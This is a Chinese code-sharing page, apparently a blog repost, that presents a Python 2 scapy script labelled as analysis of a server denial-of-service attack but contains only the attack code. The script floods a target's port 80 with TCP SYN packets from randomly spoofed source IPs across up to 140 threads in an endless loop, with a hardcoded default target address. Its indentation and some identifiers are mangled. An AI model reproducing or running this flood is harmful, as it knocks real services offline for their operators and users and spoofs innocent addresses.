分析python服务器拒绝服务攻击代码

501次阅读  |  发布于5年以前

复制代码 代码如下:

-- coding: cp936 --

from scapy.all import *
from threading import Thread,activeCount
from random import randint

class Loop(Thread):
def init(self,remoteAddr):
Thread.init(self)
self.remoteAddr = remoteAddr

def run(self):  
    ip = str(randint(0,255))+'.'\  
         +str(randint(0,255))+'.'\  
         +str(randint(0,255))+'.'\  
         +str(randint(0,255))  
    sr1(IP(src = ip,dst = self.remoteAddr)/TCP(dport = 80),retry = 0,verbose = 0,timeout = 3)

class Main(Thread):
def init(self,remoteAddr):
Thread.init(self)
self.remoteAddr = remoteAddr

def run(self):  
    limit = 140  
    total = 0  

    while True:  
        if activeCount() < limit:  
            Loop(remoteAddr = self.remoteAddr).start()  
            total = total + 1  
        print '目前已经进行的HttpFlood的次数为:',total

if name == 'main':
remoteAddr = raw_input('IP=')
if remoteAddr == '':
remoteAddr = '202.103.25.12'

Main(remoteAddr = remoteAddr).start()  

Copyright© 2013-2020

All Rights Reserved 京ICP备2023019179号-8